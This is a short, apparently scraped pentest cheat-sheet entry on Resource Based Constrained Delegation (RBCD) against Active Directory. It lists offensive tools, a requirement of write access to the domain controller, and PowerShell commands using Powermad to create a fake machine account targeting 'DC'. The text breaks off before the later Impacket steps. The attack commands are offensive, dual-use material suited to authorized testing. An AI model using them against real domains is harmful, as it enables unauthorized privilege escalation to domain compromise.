Resource Based Constrained Delegation (RBCD)
Resource Based Constrained Delegation (RBCD)
TOOLS: Bloodhound, Powermad, Powerview, Kekeo, Impacket, AD powershell module
Requirements: Your current user belongs to a group that has write access/generic all privileges on the DC.
STEPS:
Import-Module ./powermad.ps1 (Import powermad)Import-Module ActiveDirectorySet-Variable -Name "PwnPC" -Value "PWN01"Set-Variable -Name "targetComputer" -Value "DC" New-MachineAccount -MachineAccount (Get-Variable -Name "PwnPC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose ( With powermad, add the new fake computer object to AD)RBCD Impacket
Last updated